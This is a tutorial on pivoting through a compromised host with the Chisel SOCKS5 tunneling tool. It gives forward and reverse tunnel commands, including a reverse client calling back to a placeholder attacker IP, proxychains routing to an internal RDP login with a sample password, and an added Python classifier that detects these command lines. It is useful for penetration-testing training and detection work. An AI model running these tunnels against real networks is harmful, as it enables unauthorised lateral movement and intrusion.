SOCKS5 Tunneling with Chisel
Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data secured with SSH. It can create client-server tunnel connections in firewall-restricted environments.
How It Works
Chisel creates an HTTP-based tunnel secured with SSH between a client and server. When using SOCKS5 mode, the server listens on a port and forwards traffic to all networks accessible from the pivot host. The client connects and opens a local SOCKS5 proxy (default port 1080) that routes traffic through the tunnel.
This is useful when the attack host and target network are on different segments, but a compromised pivot host has access to both.
Setup
Building Chisel
git clone https://github.com/jpillora/chisel.git
cd chisel
go build
Note: glibc version mismatches between target and workstation can cause errors. Use a prebuilt binary from the Releases page if needed.
Transfer the binary to the pivot host:
scp chisel ubuntu@<PIVOT_IP>:~/
Forward Pivot
Run the server on the pivot host and the client on the attack host. Use this when inbound connections to the pivot host are allowed.
Server (Pivot Host)
./chisel server -v -p 1234 --socks5
Client (Attack Host)
./chisel client -v <PIVOT_IP>:1234 socks
The client starts a local SOCKS5 proxy on 127.0.0.1:1080.
Reverse Pivot
Run the server on the attack host and the client on the pivot host. Use this when firewall rules restrict inbound connections to the pivot host.
Server (Attack Host)
sudo ./chisel server --reverse -v -p 1234 --socks5
Client (Pivot Host)
./chisel client -v <ATTACKER_IP>:1234 R:socks
The R:socks remote listens on the server’s default SOCKS5 port (1080) and terminates at the client’s internal proxy.
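Detection example (added here, not part of the original page or the Chisel project): a classifier for process-creation telemetry that flags the forward and reverse command lines shown above by their arguments rather than by binary name. The event tuples, host names and addresses are constructed, and the optional prefix accepted before socks is an assumption.

```python
import re
import shlex

# "socks" / "R:socks" are the remote forms used on this page; the optional
# prefix before "socks" (e.g. a port) is an assumption about other variants.
SOCKS_REMOTE = re.compile(r"^(R:)?(?:.*:)?socks$")

def classify(cmdline):
    """Return a label for a chisel-style SOCKS5 tunnel command line, else None.

    The binary name is ignored on purpose: a renamed binary keeps its arguments.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in a logged command line
        argv = cmdline.split()
    if "server" in argv:
        args = argv[argv.index("server") + 1:]
        if "--reverse" in args:
            return "reverse-server"
        if "--socks5" in args:
            return "forward-server"
    if "client" in argv:
        for arg in argv[argv.index("client") + 1:]:
            m = SOCKS_REMOTE.match(arg)
            if m:
                return "reverse-client" if m.group(1) else "forward-client"
    return None

def scan(events):
    """events: iterable of (host, cmdline); returns [(host, label, cmdline)]."""
    hits = []
    for host, cmdline in events:
        label = classify(cmdline)
        if label:
            hits.append((host, label, cmdline))
    return hits

# Constructed process-creation events (host names and addresses are made up).
SAMPLE_EVENTS = [
    ("pivot01", "./chisel server -v -p 1234 --socks5"),
    ("ws07", "./chisel client -v 10.0.0.5:1234 socks"),
    ("pivot02", "/home/ubuntu/svc client -v 203.0.113.9:1234 R:socks"),
    ("web01", "python3 manage.py runserver 0.0.0.0:8000"),
    ("db01", "redis-server --port 6379"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The match is a heuristic on argument shape, so treat hits as leads to correlate with network telemetry such as a long-lived outbound HTTP connection from the same host.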
Using the Tunnel with Proxychains
Edit /etc/proxychains.conf:
[ProxyList]
socks5 127.0.0.1 1080
Then route tools through the tunnel:
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123